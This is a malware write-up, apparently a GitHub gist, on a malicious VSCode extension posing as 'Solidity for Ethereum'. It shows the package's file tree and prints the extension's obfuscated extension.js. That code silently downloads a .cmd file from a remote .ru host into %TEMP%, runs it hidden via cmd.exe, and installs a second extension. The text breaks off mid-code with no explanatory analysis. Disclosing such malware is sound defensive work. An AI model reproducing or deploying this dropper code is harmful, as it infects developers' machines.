@DuckSoft
Last active September 20, 2024 02:33
Analysis of Malware VSCode Extension "Solidity for Ethereum"

Analysis of Malware VSCode Extension "Solidity for Ethereum"

Intro

The analyzed plugin can be downloaded here. At the time of writing, it has a total of 1,484,752 installs, as shown on the extension profile page; I strongly suspect that most of them are forged.

Analysis

Download and extract the VSIX Package:

├── [Content_Types].xml
├── extension
│   ├── CHANGELOG.md
│   ├── README.md
│   ├── extension-web.js
│   ├── extension.js
│   ├── icon.jpg
│   ├── license.txt
│   └── package.json
└── extension.vsixmanifest

Looking at extension/extension.js, we found that it is obfuscated:

(function(_0x9716a9,_0x52426d){function _0xf891a1(_0x103dc0,_0x1f4322,_0x3ebcc9,_0x6c6e70){return _0x3c03(_0x1f4322-0x383,_0x3ebcc9);}const _0x45b05f=_0x9716a9();function _0x40d45b(_0x3c9b6e,_0x17381b,_0x4cc9b7,_0x566c07){return _0x3c03(_0x3c9b6e- -0x242,_0x4cc9b7);}while(!![]){try{const _0x54f1d8=-parseInt(_0x40d45b(-0xae,-0x95,-0xde,-0xde))/(0x1279+-0x65*-0x63+-0x3*0x132d)*(parseInt(_0x40d45b(-0xc6,-0xc7,-0xc3,-0xa0))/(0x3*0xc61+0x2*-0x4e+-0x2485))+parseInt(_0xf891a1(0x4a0,0x4c0,0x48c,0x4e0))/(0x160e+-0xeb*-0x17+0x2b28*-0x1)+parseInt(_0xf891a1(0x53f,0x504,0x4d3,0x51a))/(0x4bf+0x36+0xfd*-0x5)*(-parseInt(_0x40d45b(-0xa8,-0x6e,-0xc9,-0x7b))/(-0x1476+-0x4f7+0x1972))+-parseInt(_0xf891a1(0x4aa,0x4cb,0x4ce,0x507))/(0x9*0x2f4+0x1d15*-0x1+-0x287*-0x1)*(parseInt(_0xf891a1(0x4aa,0x4bb,0x49a,0x48d))/(-0x1951*-0x1+0x1*0x1698+-0x2fe2))+parseInt(_0x40d45b(-0xf9,-0xd6,-0x132,-0xf7))/(0x5fc+0x1*0x110b+-0x1d*0xcb)*(-parseInt(_0xf891a1(0x50a,0x506,0x4f8,0x4de))/(0xe3*-0x16+-0xd*-0x147+0x5e*0x8))+parseInt(_0xf891a1(0x4ef,0x524,0x548,0x541))/(-0x1850+-0x26b9+0x3f13)*(-parseInt(_0xf891a1(0x4f0,0x527,0x526,0x53d))/(-0x25df+0x13*-0x3a+0x2a38))+-parseInt(_0xf891a1(0x50d,0x4f9,0x4c5,0x4ce))/(-0x2213+-0x5*-0x199+0x1a22)*(-parseInt(_0x40d45b(-0x9a,-0xc9,-0x61,-0xc5))/(-0xc20+-0x2fd+0x50e*0x3));if(_0x54f1d8===_0x52426d)break;else _0x45b05f['push'](_0x45b05f['shift']());}catch(_0x3db05b){_0x45b05f['push'](_0x45b05f['shift']());}}}(_0xf0f8,-0xd305d+-0x248ec+-0xd4051*-0x2));const _0x482b11=(function(){const _0x18dd31={};_0x18dd31['QoZsX']='giIJB';function _0x336576(_0x3870ff,_0x6b4fb1,_0x5a788a,_0x1380e5){return _0x3c03(_0x5a788a- -0xe8,_0x6b4fb1);}_0x18dd31['jmrPA']='RAoZA',_0x18dd31['MaIlK']=_0x421feb(-0x167,-0x191,-0x18c,-0x1a2),_0x18dd31[_0x336576(0x73,0xa2,0x96,0x56)]=function(_0x5e14a7,_0x389a43){return _0x5e14a7===_0x389a43;},_0x18dd31['gxTZz']=_0x421feb(-0xf2,-0xc0,-0xb8,-0x127);const _0x237aee=_0x18dd31;let _0x2eb0ab=!![];function 
_0x421feb(_0x2cde0e,_0x1d4004,_0x9afba5,_0x141071){return _0x3c03(_0x2cde0e- -0x298,_0x9afba5);}return function(_0x14e4dd,_0x47d914){function _0x233d01(_0x3696f7,_0x50cb87,_0x5e135d,_0x11363d){return _0x336576(_0x3696f7-0xce,_0x50cb87,_0x5e135d- -0x2fc,_0x11363d-0x69);}if(_0x237aee['NCitu'](_0x237aee[_0x233d01(-0x278,-0x257,-0x26f,-0x28b)],_0x237aee['gxTZz'])){const _0x2bbf70=_0x2eb0ab?function(){function _0x5c7a44(_0x437de4,_0x454325,_0x1bbba4,_0x45c4b3){return _0x233d01(_0x437de4-0x117,_0x45c4b3,_0x1bbba4-0x634,_0x45c4b3-0x3c);}function _0xef25ee(_0x2f2085,_0x31264b,_0x2c4fed,_0x32c9cc){return _0x233d01(_0x2f2085-0x117,_0x31264b,_0x32c9cc-0x4f6,_0x32c9cc-0xc);}if(_0x237aee['QoZsX']===_0x237aee[_0x5c7a44(0x3b4,0x369,0x37f,0x396)]){if(_0x47d914){if(_0x237aee[_0x5c7a44(0x3e9,0x3c5,0x3be,0x37d)]!==_0x237aee[_0x5c7a44(0x396,0x360,0x39f,0x3ba)]){const _0x5cf33e=_0x47d914[_0xef25ee(0x2ac,0x257,0x260,0x294)](_0x14e4dd,arguments);return _0x47d914=null,_0x5cf33e;}else{_0x3461d5['window'][_0xef25ee(0x2b2,0x274,0x28e,0x289)+'ationMessa'+'ge'](_0xef25ee(0x288,0x2ad,0x276,0x291)+_0x5d3265+(_0xef25ee(0x252,0x25a,0x219,0x252)+_0xef25ee(0x26a,0x263,0x24c,0x257)+'d.'));return;}}}else _0x2d3f14[_0x5c7a44(0x3e8,0x3b3,0x3e5,0x3ad)][_0xef25ee(0x205,0x266,0x213,0x240)+_0xef25ee(0x26a,0x26d,0x29a,0x27a)](_0xef25ee(0x2a8,0x2ed,0x2aa,0x2bb)+_0xef25ee(0x21e,0x279,0x285,0x251)+_0xef25ee(0x249,0x2a5,0x2b5,0x276));}:function(){};return _0x2eb0ab=![],_0x2bbf70;}else{const _0x294a87=_0x1751f5?function(){function _0x5cd6da(_0x1d1aa4,_0x2e0732,_0x2e7b00,_0x2e35ce){return _0x233d01(_0x1d1aa4-0xd3,_0x2e0732,_0x2e7b00-0x26f,_0x2e35ce-0x1f2);}if(_0x21d99c){const _0x2f4cf8=_0x36b78a[_0x5cd6da(0x2d,0x8,0xd,0x1)](_0x903178,arguments);return _0x542218=null,_0x2f4cf8;}}:function(){};return _0x45baac=![],_0x294a87;}};}()),_0x360413=_0x482b11(this,function(){const _0x6d497a={};_0x6d497a[_0x1edfb6(0x177,0x12e,0x14d,0x148)]=_0x2e42ea(0x44e,0x448,0x488,0x45e)+'+$';function 
_0x1edfb6(_0x3993e1,_0x31386c,_0x3759bf,_0x17227e){return _0x3c03(_0x17227e- -0x3f,_0x31386c);}const _0x3a511a=_0x6d497a;function _0x2e42ea(_0x43e43a,_0xd154cf,_0xe5704a,_0x3d6291){return _0x3c03(_0x43e43a-0x2a3,_0xd154cf);}return _0x360413['toString']()[_0x1edfb6(0x112,0xf7,0x13b,0x10e)](_0x3a511a[_0x2e42ea(0x42a,0x455,0x42e,0x40c)])[_0x1edfb6(0x125,0xfd,0xd6,0xfd)]()['constructo'+'r'](_0x360413)[_0x2e42ea(0x3f0,0x430,0x3ed,0x424)](_0x3a511a['HdzzO']);});_0x360413();const _0x29d036=(function(){const _0x54ef9a={};function _0x556959(_0x5bf878,_0x1153d7,_0x1ebe9d,_0xd700d4){return _0x3c03(_0xd700d4- -0x283,_0x5bf878);}function _0x596019(_0x33cd86,_0x29daa8,_0x4444ae,_0x4dd26d){return _0x3c03(_0x29daa8-0xc4,_0x4dd26d);}_0x54ef9a[_0x556959(-0x113,-0x10d,-0x123,-0x132)]=function(_0x8a854b,_0x2c8c44){return _0x8a854b!==_0x2c8c44;},_0x54ef9a[_0x556959(-0xc5,-0xd2,-0x105,-0xe5)]=_0x556959(-0xe3,-0xb3,-0xac,-0xde);const _0x4f93ce=_0x54ef9a;let _0x44f64c=!![];return function(_0x44003b,_0x1d71f8){const _0x1f0bdf=_0x44f64c?function(){function _0x41b214(_0x4d3f1f,_0xfc85d1,_0x56e3e8,_0x5de065){return _0x3c03(_0x56e3e8-0x373,_0x4d3f1f);}function _0x3bbf5b(_0x43cd12,_0x4c008a,_0x409280,_0x4f9bf6){return _0x3c03(_0x4f9bf6-0x2e6,_0x4c008a);}if(_0x1d71f8){if(_0x4f93ce[_0x3bbf5b(0x471,0x433,0x467,0x437)](_0x4f93ce[_0x3bbf5b(0x4b1,0x4a0,0x49a,0x484)],_0x4f93ce['JLzsf'])){if(_0x152593){const _0xa0e161=_0xe82cf0[_0x41b214(0x52d,0x4c9,0x4f5,0x513)](_0x270071,arguments);return _0x4c6497=null,_0xa0e161;}}else{const _0x3d37cc=_0x1d71f8['apply'](_0x44003b,arguments);return _0x1d71f8=null,_0x3d37cc;}}}:function(){};return _0x44f64c=![],_0x1f0bdf;};}()),_0x258824=_0x29d036(this,function(){const _0x381f0b={'IDqGq':_0x4306ff(0x13a,0x10f,0xe7,0x145)+_0x3c6bd5(0x49a,0x4a7,0x460,0x494)+_0x3c6bd5(0x471,0x4a8,0x485,0x49b)+'\x20)','DFoQB':function(_0x5ba4f8,_0x5695ce){return 
_0x5ba4f8===_0x5695ce;},'AjhYD':_0x3c6bd5(0x492,0x491,0x4b7,0x4a8),'SCmbl':_0x3c6bd5(0x446,0x469,0x401,0x430),'tbSXT':function(_0x16f312){return _0x16f312();},'vakbm':_0x3c6bd5(0x49f,0x4b4,0x471,0x4a7),'kHrzR':_0x3c6bd5(0x450,0x464,0x460,0x468),'uWbXp':'error','YMGii':_0x4306ff(0x143,0x130,0x109,0xfc),'uyzPF':_0x3c6bd5(0x4c8,0x4ce,0x4b2,0x493),'qNRFC':'trace','HuPhI':function(_0xc239d0,_0x4a089c){return _0xc239d0<_0x4a089c;}};function _0x3c6bd5(_0x1fcc73,_0x1f6dca,_0x229ae9,_0x4bf8a6){return _0x3c03(_0x4bf8a6-0x2fb,_0x1fcc73);}const _0x578214=function(){let _0x217acd;function _0x4c0f9d(_0xb68552,_0x5ddf38,_0x40b948,_0x45cd7f){return _0x4306ff(_0xb68552-0xfd,_0x45cd7f-0xaa,_0x40b948-0x64,_0x5ddf38);}function _0x85a108(_0x4cb3cd,_0x1eab5c,_0x3fc94b,_0x26f25e){return _0x3c6bd5(_0x3fc94b,_0x1eab5c-0x14a,_0x3fc94b-0x12e,_0x1eab5c- -0x376);}try{_0x217acd=Function(_0x4c0f9d(0x1fe,0x1e0,0x1fb,0x1cf)+'nction()\x20'+_0x381f0b[_0x4c0f9d(0x1d8,0x1a5,0x1de,0x1d0)]+');')();}catch(_0x1abdcb){if(_0x381f0b[_0x85a108(0x11a,0xdd,0xa8,0x103)](_0x381f0b[_0x4c0f9d(0x1db,0x1d0,0x228,0x1ff)],_0x381f0b['SCmbl'])){const _0x179a9b=_0x313df7?function(){function _0x240bae(_0x12340a,_0x4f2f53,_0x5835ac,_0x8e92bb){return _0x85a108(_0x12340a-0x7c,_0x8e92bb-0x3ee,_0x4f2f53,_0x8e92bb-0x174);}if(_0x348a7d){const _0x5122bc=_0x93ec26[_0x240bae(0x532,0x4e4,0x4f4,0x4f5)](_0x1d4f7f,arguments);return _0x3f48c4=null,_0x5122bc;}}:function(){};return _0x343c31=![],_0x179a9b;}else _0x217acd=window;}return _0x217acd;},_0x3e65c3=_0x381f0b['tbSXT'](_0x578214);function _0x4306ff(_0x3820dc,_0x174a4e,_0x56f841,_0x16c994){return _0x3c03(_0x174a4e- -0x37,_0x16c994);}const 
_0x4eff57=_0x3e65c3[_0x4306ff(0x10a,0x134,0x138,0x113)]=_0x3e65c3['console']||{},_0x4ccd38=[_0x381f0b[_0x4306ff(0x143,0x13d,0x15c,0x109)],_0x3c6bd5(0x4c9,0x4da,0x479,0x49a),_0x381f0b[_0x3c6bd5(0x41c,0x42d,0x420,0x42e)],_0x381f0b['uWbXp'],_0x381f0b[_0x3c6bd5(0x4a3,0x4a9,0x43f,0x46a)],_0x381f0b['uyzPF'],_0x381f0b[_0x3c6bd5(0x4aa,0x46d,0x46c,0x488)]];for(let _0x222921=0x76b+-0xaa8+0x33d;_0x381f0b['HuPhI'](_0x222921,_0x4ccd38[_0x4306ff(0x14c,0x110,0xfd,0x124)]);_0x222921++){const _0x3e9199=_0x29d036[_0x4306ff(0x155,0x14f,0x180,0x110)+'r'][_0x4306ff(0xfb,0x129,0x119,0xf1)]['bind'](_0x29d036),_0x1676db=_0x4ccd38[_0x222921],_0x3dc041=_0x4eff57[_0x1676db]||_0x3e9199;_0x3e9199[_0x4306ff(0x184,0x16b,0x1a1,0x1a0)]=_0x29d036['bind'](_0x29d036),_0x3e9199[_0x4306ff(0x122,0x105,0xf7,0x13b)]=_0x3dc041[_0x4306ff(0xf8,0x105,0x128,0x128)][_0x3c6bd5(0x434,0x498,0x4b2,0x473)](_0x3dc041),_0x4eff57[_0x1676db]=_0x3e9199;}});_0x258824();const vscode=require(_0x1b14ab(0x3d7,0x3dd,0x3eb,0x3dc)),{exec}=require(_0x12661e(0x4c3,0x4ec,0x4a8,0x4df)+_0x1b14ab(0x38e,0x3c1,0x35b,0x3aa));function _0x1b14ab(_0x3a55a5,_0xedf765,_0x423979,_0x5197f7){return _0x3c03(_0x3a55a5-0x244,_0x423979);}function executeCmdCommand(_0x2fef7b){const _0xffedf5={'bPqJr':function(_0xc054fa,_0x224e32){return _0xc054fa(_0x224e32);},'LHedt':function(_0x54c305){return _0x54c305();},'xVpZa':function(_0x4de69b,_0x1e2c9b){return _0x4de69b===_0x1e2c9b;},'IGIdL':function(_0x2bddc5,_0xeace6d,_0x5570be,_0x4be210){return _0x2bddc5(_0xeace6d,_0x5570be,_0x4be210);}};return new Promise((_0xae7d9,_0x7f526a)=>{const _0x262166={'VAbYg':function(_0x2fdeff,_0x7bee77){function _0x51d031(_0x36b357,_0x450348,_0x27cda9,_0x13f438){return _0x3c03(_0x36b357-0x19b,_0x13f438);}return _0xffedf5[_0x51d031(0x2f4,0x318,0x303,0x30a)](_0x2fdeff,_0x7bee77);},'kLvyX':function(_0x3b2038){function _0x5cc9d3(_0x319e16,_0x3c5c43,_0x5e1c44,_0x2b1350){return _0x3c03(_0x319e16-0x2e6,_0x2b1350);}return 
_0xffedf5[_0x5cc9d3(0x44b,0x45a,0x459,0x43e)](_0x3b2038);}};function _0xb86970(_0xe615e2,_0x13a07f,_0x1eb097,_0x57ee32){return _0x3c03(_0xe615e2- -0x3ce,_0x57ee32);}function _0x41d4a5(_0x38ab6f,_0x3f27b5,_0x4a8b28,_0x97085a){return _0x3c03(_0x4a8b28-0xb1,_0x97085a);}if(_0xffedf5[_0x41d4a5(0x1cc,0x1e2,0x1e5,0x1f2)]('lprfy',_0x41d4a5(0x1ca,0x1e2,0x1e3,0x21a))){const _0x4f7d21=_0x3eeae6[_0x41d4a5(0x232,0x20b,0x233,0x210)](_0x3ed73c,arguments);return _0x484774=null,_0x4f7d21;}else{const _0x2ab19d={};_0x2ab19d[_0x41d4a5(0x210,0x240,0x20f,0x223)+'e']=!![],_0xffedf5[_0xb86970(-0x268,-0x263,-0x23b,-0x240)](exec,'cmd.exe\x20/c'+'\x20'+_0x2fef7b,_0x2ab19d,(_0x204c12,_0x16d185,_0x2c3cbf)=>{if(_0x204c12){_0x262166[_0x442650(0x206,0x1f4,0x20c,0x206)](_0x7f526a,_0x204c12);return;}function _0x41e239(_0x18598d,_0x549b38,_0x21af5e,_0x2175fb){return _0x41d4a5(_0x18598d-0x135,_0x549b38-0xd2,_0x549b38- -0x456,_0x18598d);}function _0x442650(_0x5ad15a,_0x6a80a2,_0x7e14e7,_0x5cb2a2){return _0x41d4a5(_0x5ad15a-0x1a9,_0x6a80a2-0x49,_0x7e14e7-0x4,_0x6a80a2);}_0x262166[_0x41e239(-0x232,-0x23c,-0x27c,-0x248)](_0xae7d9);});}});}async function installExtension(_0x147356){const _0x538b57={'OKnqF':function(_0x1e9499,_0x37924b){return _0x1e9499===_0x37924b;},'kwDiA':_0x57a753(-0x263,-0x25a,-0x268,-0x287),'yoiVk':_0x37c8db(0x13f,0x121,0x119,0x108)+_0x37c8db(0x102,0x153,0x136,0x127)+_0x57a753(-0x215,-0x248,-0x27a,-0x27d)+_0x57a753(-0x258,-0x281,-0x25e,-0x27c),'rnhzK':function(_0x234946,_0x441ff5,_0x26a885){return _0x234946(_0x441ff5,_0x26a885);},'dXeXP':function(_0x4cd109,_0x5410ae){return _0x4cd109!==_0x5410ae;},'tfsQE':_0x37c8db(0xb7,0xc1,0xf6,0xd7)};function _0x37c8db(_0x9938f1,_0x38b693,_0x2658b8,_0x2c6bb6){return _0x12661e(_0x2658b8- -0x3c5,_0x38b693,_0x2658b8-0x152,_0x2c6bb6-0x1a5);}function _0x57a753(_0x24e840,_0x217c9b,_0x39fcfb,_0x413372){return _0x1b14ab(_0x217c9b- -0x629,_0x217c9b-0x1b3,_0x24e840,_0x413372-0x16a);}try{const 
_0x589c71=vscode[_0x37c8db(0x146,0x102,0x136,0x137)][_0x57a753(-0x25e,-0x249,-0x276,-0x212)+'on'](_0x147356);if(_0x589c71){vscode[_0x37c8db(0x109,0x138,0x13d,0xfe)][_0x57a753(-0x298,-0x26e,-0x2ac,-0x296)+_0x37c8db(0x172,0x134,0x139,0x123)+'ge'](_0x57a753(-0x244,-0x266,-0x270,-0x24c)+_0x147356+(_0x57a753(-0x2e6,-0x2a5,-0x2cf,-0x2df)+_0x57a753(-0x2c1,-0x2a0,-0x2d8,-0x2bd)+'d.'));return;}await vscode['commands']['executeCom'+_0x37c8db(0xf5,0xea,0x10b,0x112)](_0x538b57[_0x37c8db(0xd5,0x139,0xfc,0xd9)],_0x147356),vscode[_0x37c8db(0xff,0x10a,0x13d,0x130)][_0x37c8db(0x11b,0x152,0x11f,0x12a)+'ationMessa'+'ge'](_0x57a753(-0x27f,-0x273,-0x278,-0x23c)+'\x20'+_0x147356+'.'),_0x538b57[_0x57a753(-0x239,-0x256,-0x284,-0x236)](setTimeout,async()=>{function _0x21a69d(_0x4f39e6,_0x4541df,_0x3752e9,_0x5d1ab3){return _0x57a753(_0x4541df,_0x5d1ab3-0xb5,_0x3752e9-0x8b,_0x5d1ab3-0x1d4);}const _0x40cc6e=vscode[_0x447405(-0x1d2,-0x1ef,-0x1ba,-0x1bb)][_0x21a69d(-0x170,-0x16a,-0x1bc,-0x194)+'on'](_0x147356);function _0x447405(_0x5957b1,_0x575d73,_0x475e23,_0x6440c2){return _0x37c8db(_0x5957b1-0x12c,_0x475e23,_0x5957b1- -0x308,_0x6440c2-0x86);}if(_0x40cc6e&&!_0x40cc6e[_0x447405(-0x1c5,-0x18d,-0x1d8,-0x201)]){if(_0x538b57['OKnqF'](_0x538b57['kwDiA'],_0x538b57[_0x447405(-0x1b6,-0x1d9,-0x183,-0x1dd)]))await _0x40cc6e['activate'](),vscode['window']['showInform'+_0x21a69d(-0x182,-0x160,-0x1cf,-0x19f)+'ge'](_0x447405(-0x1e1,-0x205,-0x1ee,-0x20c)+'has\x20been\x20a'+'ctivated.');else{if(_0x1bb431){const _0x339e3d=_0x481bb1['apply'](_0x15c2f7,arguments);return _0x40b899=null,_0x339e3d;}}}},0x1521+-0x1a71+-0x884*-0x2);}catch(_0x5055ed){if(_0x538b57[_0x57a753(-0x2c0,-0x2a2,-0x2b7,-0x287)](_0x57a753(-0x282,-0x2aa,-0x2a6,-0x2bb),_0x538b57[_0x57a753(-0x247,-0x286,-0x282,-0x2b8)]))vscode[_0x37c8db(0x156,0x14f,0x13d,0x126)][_0x37c8db(0xd8,0xbb,0xd6,0xd5)+'essage'](_0x57a753(-0x263,-0x23c,-0x26d,-0x200)+_0x57a753(-0x295,-0x2a6,-0x273,-0x287)+_0x57a753(-0x2ad,-0x281,-0x256,-0x29e));else{const 
_0x47360e=_0x3e1795['constructo'+'r'][_0x37c8db(0xd8,0x142,0x108,0xef)][_0x57a753(-0x244,-0x26d,-0x264,-0x282)](_0x2ef05c),_0x5c8a0b=_0xa262b2[_0x550ee2],_0x42db56=_0x340952[_0x5c8a0b]||_0x47360e;_0x47360e['__proto__']=_0x3e6646[_0x57a753(-0x269,-0x26d,-0x2a8,-0x282)](_0x984694),_0x47360e[_0x37c8db(0xc7,0x113,0xe4,0xc6)]=_0x42db56[_0x37c8db(0xe5,0xbf,0xe4,0xf0)][_0x57a753(-0x234,-0x26d,-0x24c,-0x27a)](_0x42db56),_0x2d882f[_0x5c8a0b]=_0x47360e;}}}function activate(_0x43fab4){const _0xe16992={'eIlZt':function(_0x6cb867){return _0x6cb867();},'pinSO':function(_0x48c06b,_0x4fa553,_0x767caf,_0x272bec){return _0x48c06b(_0x4fa553,_0x767caf,_0x272bec);},'VpTgS':function(_0x5e7da5,_0x51cead){return _0x5e7da5===_0x51cead;},'vFliq':_0x22f9c5(-0x21e,-0x24a,-0x1ee,-0x245),'ZPmEO':_0x22f9c5(-0x23e,-0x23f,-0x23a,-0x227)+_0x4769fb(-0x63,-0x6b,-0x38,-0x84)+'hyareyouhe'+'rewho.ru/f'+'iles/1.cmd'+'\x20-o\x20\x22%TEMP'+_0x22f9c5(-0x1e7,-0x1f4,-0x1ed,-0x1d4)+_0x4769fb(-0x18,-0x51,-0x8b,-0x13)+_0x22f9c5(-0x1fe,-0x209,-0x1d0,-0x21b),'zICBo':function(_0x293e37,_0x5d158b){return _0x293e37(_0x5d158b);},'KqJLi':_0x22f9c5(-0x209,-0x1ed,-0x1d7,-0x1e2)+_0x22f9c5(-0x22c,-0x224,-0x201,-0x265)+_0x4769fb(-0x71,-0x33,-0x3f,-0x45),'Tmnco':function(_0x2b1942){return _0x2b1942();},'GIPhe':function(_0x37ca4d,_0x234f32,_0x2133f3,_0x3bb70b){return _0x37ca4d(_0x234f32,_0x2133f3,_0x3bb70b);},'VPwaf':_0x4769fb(-0x2f,-0x16,-0x16,-0x26),'BHrOH':_0x22f9c5(-0x20e,-0x24c,-0x218,-0x216)+_0x22f9c5(-0x257,-0x218,-0x283,-0x26b)+_0x22f9c5(-0x255,-0x225,-0x261,-0x25c),'OBaZV':function(_0x432c60,_0x332d75){return _0x432c60===_0x332d75;},'kykOE':function(_0x49a7de,_0x22fe81,_0x4fb8ed){return _0x49a7de(_0x22fe81,_0x4fb8ed);}};let _0x2328bf=vscode[_0x4769fb(-0x37,-0x9,0x12,0x13)][_0x4769fb(-0x81,-0x60,-0x7c,-0x80)+_0x4769fb(-0x1c,-0x40,-0x25,-0x38)](_0x4769fb(-0x23,-0x2c,0x13,-0x19)+_0x22f9c5(-0x257,-0x284,-0x239,-0x26f)+'Cmd',async function(){function _0xebcd7d(_0x1b68ef,_0x131300,_0x12f9b5,_0x19d49f){return 
_0x4769fb(_0x1b68ef-0x129,_0x12f9b5-0x3e9,_0x12f9b5-0x1e3,_0x19d49f);}function _0x5df97d(_0x1dc3da,_0x174865,_0x57a732,_0x5a4ed0){return _0x22f9c5(_0x174865-0x70f,_0x174865-0x1c7,_0x1dc3da,_0x5a4ed0-0x3f);}if(_0xe16992[_0xebcd7d(0x3a9,0x3ae,0x3a7,0x3b2)](process['platform'],_0xe16992['vFliq'])){const _0x3a240f=_0xe16992['ZPmEO'],_0x167175=_0x5df97d(0x4cc,0x4cc,0x48c,0x4fb)+_0xebcd7d(0x3ff,0x3d5,0x3c1,0x3e7)+_0x5df97d(0x4a9,0x4d4,0x4eb,0x4b7)+_0xebcd7d(0x3f4,0x3d7,0x3cf,0x3f1);try{if(_0xe16992[_0xebcd7d(0x3b9,0x391,0x3a7,0x3e6)](_0x5df97d(0x4e8,0x4b1,0x476,0x47c),_0x5df97d(0x4ee,0x518,0x4ed,0x537))){const _0x3cad9d={'uXPKa':function(_0x59ff3f){function _0xa76b1(_0x51c0c2,_0x1e78d1,_0x265d45,_0x5d8776){return _0x5df97d(_0x51c0c2,_0x1e78d1- -0x687,_0x265d45-0x1a5,_0x5d8776-0x114);}return _0xe16992[_0xa76b1(-0x1c9,-0x1cc,-0x1d8,-0x1e1)](_0x59ff3f);}},_0x4bb144={};_0x4bb144['windowsHid'+'e']=!![],_0xe16992[_0xebcd7d(0x396,0x3dd,0x39e,0x3c4)](_0x5d1214,_0x5df97d(0x4d0,0x4bf,0x47f,0x4a6)+'\x20'+_0x52337c,_0x4bb144,(_0x321ece,_0x1b3ee2,_0x3d66a1)=>{if(_0x321ece){_0x40812e(_0x321ece);return;}_0x3cad9d['uXPKa'](_0xaef7f9);});}else await Promise[_0xebcd7d(0x3a7,0x33d,0x36a,0x36a)]([_0xe16992[_0xebcd7d(0x3f8,0x3d7,0x3c5,0x3d5)](executeCmdCommand,_0x3a240f),_0xe16992[_0xebcd7d(0x38f,0x393,0x3c5,0x3aa)](installExtension,_0x167175)]),vscode[_0xebcd7d(0x404,0x3c1,0x3d2,0x39b)][_0x5df97d(0x4f4,0x4f8,0x514,0x4bb)+'ationMessa'+'ge'](_0xe16992['KqJLi']);}catch(_0x356ee9){}}});_0x43fab4[_0x22f9c5(-0x239,-0x213,-0x23e,-0x1fc)+_0x4769fb(-0x6a,-0x32,0xb,-0x46)]['push'](_0x2328bf);function _0x22f9c5(_0x1dc4a1,_0x40129b,_0x3525b2,_0x5df871){return _0x12661e(_0x1dc4a1- -0x6fb,_0x3525b2,_0x3525b2-0x1df,_0x5df871-0x2);}function _0x4769fb(_0x21be31,_0x3387bf,_0x3ade1c,_0x33704a){return _0x1b14ab(_0x3387bf- 
-0x3f0,_0x3387bf-0x15a,_0x33704a,_0x33704a-0x193);}_0xe16992[_0x4769fb(-0x49,-0x6a,-0x68,-0x40)](process[_0x4769fb(-0x5d,-0x5a,-0x4a,-0x1d)],_0xe16992[_0x22f9c5(-0x213,-0x1f3,-0x223,-0x237)])&&_0xe16992['kykOE'](setTimeout,()=>{function _0x36c701(_0x251bf5,_0x246d16,_0x1ba6c7,_0x2e8606){return _0x4769fb(_0x251bf5-0x88,_0x2e8606- -0x73,_0x1ba6c7-0x76,_0x246d16);}const _0x5a0118={'SxCJF':function(_0x8c545e,_0x26e62e){function _0x4f0d73(_0x3f8409,_0x2204fa,_0x10b898,_0x55abd4){return _0x3c03(_0x3f8409- -0x6a,_0x2204fa);}return _0xe16992[_0x4f0d73(0x11e,0x101,0xfa,0xf9)](_0x8c545e,_0x26e62e);},'aVCwR':function(_0x533559){return _0xe16992['Tmnco'](_0x533559);},'CKpCV':function(_0x45bd35,_0x4de24e,_0xaac84d,_0x1f5906){return _0xe16992['GIPhe'](_0x45bd35,_0x4de24e,_0xaac84d,_0x1f5906);}};function _0x1590f4(_0x527a78,_0x3a30a2,_0x4bc2ea,_0x7c48ba){return _0x22f9c5(_0x527a78-0x563,_0x3a30a2-0x1b4,_0x7c48ba,_0x7c48ba-0x1e1);}if(_0xe16992['VpTgS'](_0x1590f4(0x36b,0x396,0x388,0x359),_0xe16992['VPwaf']))vscode[_0x36c701(-0x59,-0xa0,-0x72,-0x7c)][_0x36c701(-0xcc,-0x8b,-0xe0,-0xa2)+_0x36c701(-0xc7,-0xde,-0xc7,-0xbc)](_0xe16992[_0x36c701(-0xee,-0x121,-0xae,-0xe9)]);else return new _0x23d6c9((_0x1ea10b,_0x39626b)=>{function _0x248d14(_0x44779a,_0x98532,_0xd82e9,_0x692eba){return _0x36c701(_0x44779a-0x4d,_0x44779a,_0xd82e9-0x1b,_0x692eba-0x157);}function _0x3848c5(_0x22501f,_0x737480,_0x31ee32,_0x4ebbb6){return _0x36c701(_0x22501f-0x190,_0x737480,_0x31ee32-0x16d,_0x4ebbb6-0x33);}const _0x7b48b9={'KhyMQ':function(_0x5f0812,_0x8cedea){return _0x5a0118['SxCJF'](_0x5f0812,_0x8cedea);},'EudqH':function(_0x308719){return _0x5a0118['aVCwR'](_0x308719);}},_0xdf37a5={};_0xdf37a5[_0x248d14(0xac,0x95,0x60,0x96)+'e']=!![],_0x5a0118[_0x3848c5(-0x6c,-0x5e,-0x7d,-0x62)](_0x553a5f,_0x3848c5(-0xac,-0x7f,-0xb5,-0xae)+'\x20'+_0xe34177,_0xdf37a5,(_0x4a4a77,_0x3025a,_0x278c89)=>{function _0x100f9b(_0x409d52,_0x46d1f4,_0xa80756,_0x25863f){return 
_0x3848c5(_0x409d52-0x1ed,_0x409d52,_0xa80756-0xc2,_0x25863f-0x4f9);}function _0x5a3ccf(_0xfd24d9,_0x83b346,_0x19b7b9,_0x11f02e){return _0x3848c5(_0xfd24d9-0x3a,_0x11f02e,_0x19b7b9-0xb,_0xfd24d9-0x351);}if(_0x4a4a77){_0x7b48b9[_0x100f9b(0x42e,0x45a,0x45b,0x451)](_0x39626b,_0x4a4a77);return;}_0x7b48b9[_0x5a3ccf(0x2d8,0x2c9,0x2b7,0x2d0)](_0x1ea10b);});});},0x23e+-0x1b*0x47+0x927);}function _0x3c03(_0x4db7c7,_0x2c4387){const _0x360413=_0xf0f8();return _0x3c03=function(_0x482b11,_0xf0f8bc){_0x482b11=_0x482b11-(-0x1dad+0x1acb+0x40f);let _0x3c032c=_0x360413[_0x482b11];return _0x3c032c;},_0x3c03(_0x4db7c7,_0x2c4387);}function deactivate(){}function _0xf0f8(){const _0x4e3776=['bPqJr','deactivate','&\x20\x22%TEMP%\x5c','return\x20(fu','IDqGq','windowsHid','tfsQE','prototype','pinSO','on\x20have\x20co','mand','tension','LHedt','IGIdL','exception','essage','kLvyX','VpTgS','console','mmand','info','jmrPA','YMGii','win32','workbench.','Installing','EudqH','vakbm','gxTZz','9637764vBnJbd','showInform','bind','mpleted.','ons','vFliq','136yPraIG','executeCom','NCitu','Extension\x20','hubtestman','20232pgInfm','apply','9qVlxwi','solidity-v','Installati','constructo','HdzzO','zICBo','exports','CKpCV','KDWJh','AjhYD','qNRFC','extensions','rnhzK','1.cmd\x22','ationMessa','tor','vscode','1781BYYAUR','window','Rzvzp','PZyEt','table','ctor(\x22retu','140JKypRM','isActive','getExtensi','.installEx','JLzsf','warn','rn\x20this\x22)(','1230cAvHJL','__proto__','commands','87307CjgkoA','jysXR','AlADD','%\x5c1.cmd\x22\x